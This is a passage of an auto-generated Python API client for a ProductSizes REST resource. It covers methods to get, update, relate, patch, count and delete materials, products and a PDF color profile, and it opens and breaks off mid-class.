def product_sizes_id_materials_fk_get_with_http_info(self, id, fk, **kwargs):
"""
Find a related item by id for materials.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_fk_get_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for materials (required)
:return: ProductMaterial
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_materials_fk_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_materials_fk_get`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `product_sizes_id_materials_fk_get`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/materials/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductMaterial',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_materials_fk_put(self, id, fk, **kwargs):
"""
Update a related item by id for materials.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_fk_put(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for materials (required)
:param ProductMaterial data:
:return: ProductMaterial
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_materials_fk_put_with_http_info(id, fk, **kwargs)
else:
(data) = self.product_sizes_id_materials_fk_put_with_http_info(id, fk, **kwargs)
return data
def product_sizes_id_materials_fk_put_with_http_info(self, id, fk, **kwargs):
"""
Update a related item by id for materials.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_fk_put_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for materials (required)
:param ProductMaterial data:
:return: ProductMaterial
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_materials_fk_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_materials_fk_put`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `product_sizes_id_materials_fk_put`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/materials/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductMaterial',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_materials_get(self, id, **kwargs):
"""
Queries materials of ProductSize.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str filter:
:return: list[ProductMaterial]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_materials_get_with_http_info(id, **kwargs)
else:
(data) = self.product_sizes_id_materials_get_with_http_info(id, **kwargs)
return data
def product_sizes_id_materials_get_with_http_info(self, id, **kwargs):
"""
Queries materials of ProductSize.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str filter:
:return: list[ProductMaterial]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'filter']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_materials_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_materials_get`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/materials'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'filter' in params:
query_params['filter'] = params['filter']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[ProductMaterial]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_materials_post(self, id, **kwargs):
"""
Creates a new instance in materials of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_post(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param ProductMaterial data:
:return: ProductMaterial
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_materials_post_with_http_info(id, **kwargs)
else:
(data) = self.product_sizes_id_materials_post_with_http_info(id, **kwargs)
return data
def product_sizes_id_materials_post_with_http_info(self, id, **kwargs):
"""
Creates a new instance in materials of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_post_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param ProductMaterial data:
:return: ProductMaterial
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_materials_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_materials_post`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/materials'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductMaterial',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_materials_rel_fk_delete(self, id, fk, **kwargs):
"""
Remove the materials relation to an item by id.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_rel_fk_delete(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for materials (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_materials_rel_fk_delete_with_http_info(id, fk, **kwargs)
else:
(data) = self.product_sizes_id_materials_rel_fk_delete_with_http_info(id, fk, **kwargs)
return data
def product_sizes_id_materials_rel_fk_delete_with_http_info(self, id, fk, **kwargs):
"""
Remove the materials relation to an item by id.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_rel_fk_delete_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for materials (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_materials_rel_fk_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_materials_rel_fk_delete`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `product_sizes_id_materials_rel_fk_delete`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/materials/rel/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_materials_rel_fk_head(self, id, fk, **kwargs):
"""
Check the existence of materials relation to an item by id.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_rel_fk_head(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for materials (required)
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_materials_rel_fk_head_with_http_info(id, fk, **kwargs)
else:
(data) = self.product_sizes_id_materials_rel_fk_head_with_http_info(id, fk, **kwargs)
return data
def product_sizes_id_materials_rel_fk_head_with_http_info(self, id, fk, **kwargs):
"""
Check the existence of materials relation to an item by id.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_rel_fk_head_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for materials (required)
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_materials_rel_fk_head" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_materials_rel_fk_head`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `product_sizes_id_materials_rel_fk_head`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/materials/rel/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'HEAD',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_materials_rel_fk_put(self, id, fk, **kwargs):
"""
Add a related item by id for materials.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_rel_fk_put(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for materials (required)
:param ProductSizeMaterial data:
:return: ProductSizeMaterial
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_materials_rel_fk_put_with_http_info(id, fk, **kwargs)
else:
(data) = self.product_sizes_id_materials_rel_fk_put_with_http_info(id, fk, **kwargs)
return data
def product_sizes_id_materials_rel_fk_put_with_http_info(self, id, fk, **kwargs):
"""
Add a related item by id for materials.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_rel_fk_put_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for materials (required)
:param ProductSizeMaterial data:
:return: ProductSizeMaterial
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_materials_rel_fk_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_materials_rel_fk_put`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `product_sizes_id_materials_rel_fk_put`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/materials/rel/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductSizeMaterial',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_patch(self, id, **kwargs):
"""
Patch attributes for a model instance and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_patch(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param ProductSize data: An object of model property name/value pairs
:return: ProductSize
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_patch_with_http_info(id, **kwargs)
else:
(data) = self.product_sizes_id_patch_with_http_info(id, **kwargs)
return data
def product_sizes_id_patch_with_http_info(self, id, **kwargs):
"""
Patch attributes for a model instance and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_patch_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param ProductSize data: An object of model property name/value pairs
:return: ProductSize
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_patch" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_patch`")
collection_formats = {}
resource_path = '/ProductSizes/{id}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductSize',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_pdf_color_profile_get(self, id, **kwargs):
"""
Fetches belongsTo relation pdfColorProfile.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_pdf_color_profile_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param bool refresh:
:return: ProductPdfColorProfile
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_pdf_color_profile_get_with_http_info(id, **kwargs)
else:
(data) = self.product_sizes_id_pdf_color_profile_get_with_http_info(id, **kwargs)
return data
def product_sizes_id_pdf_color_profile_get_with_http_info(self, id, **kwargs):
"""
Fetches belongsTo relation pdfColorProfile.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_pdf_color_profile_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param bool refresh:
:return: ProductPdfColorProfile
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'refresh']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_pdf_color_profile_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_pdf_color_profile_get`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/pdfColorProfile'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'refresh' in params:
query_params['refresh'] = params['refresh']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductPdfColorProfile',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_products_count_get(self, id, **kwargs):
"""
Counts products of ProductSize.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_products_count_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_products_count_get_with_http_info(id, **kwargs)
else:
(data) = self.product_sizes_id_products_count_get_with_http_info(id, **kwargs)
return data
def product_sizes_id_products_count_get_with_http_info(self, id, **kwargs):
"""
Counts products of ProductSize.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_products_count_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'where']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_products_count_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_products_count_get`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/products/count'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'where' in params:
query_params['where'] = params['where']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2001',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_products_delete(self, id, **kwargs):
"""
Deletes all products of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_products_delete(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_products_delete_with_http_info(id, **kwargs)
else:
(data) = self.product_sizes_id_products_delete_with_http_info(id, **kwargs)
return data
def product_sizes_id_products_delete_with_http_info(self, id, **kwargs):
"""
Deletes all products of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_products_delete_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_products_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_products_delete`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/products'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_products_fk_delete(self, id, fk, **kwargs):
"""
Delete a related item by id for products.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_products_fk_delete(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for products (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_products_fk_delete_with_http_info(id, fk, **kwargs)
else:
(data) = self.product_sizes_id_products_fk_delete_with_http_info(id, fk, **kwargs)
return data
def product_sizes_id_products_fk_delete_with_http_info(self, id, fk, **kwargs):
"""
Delete a related item by id for products.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_products_fk_delete_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
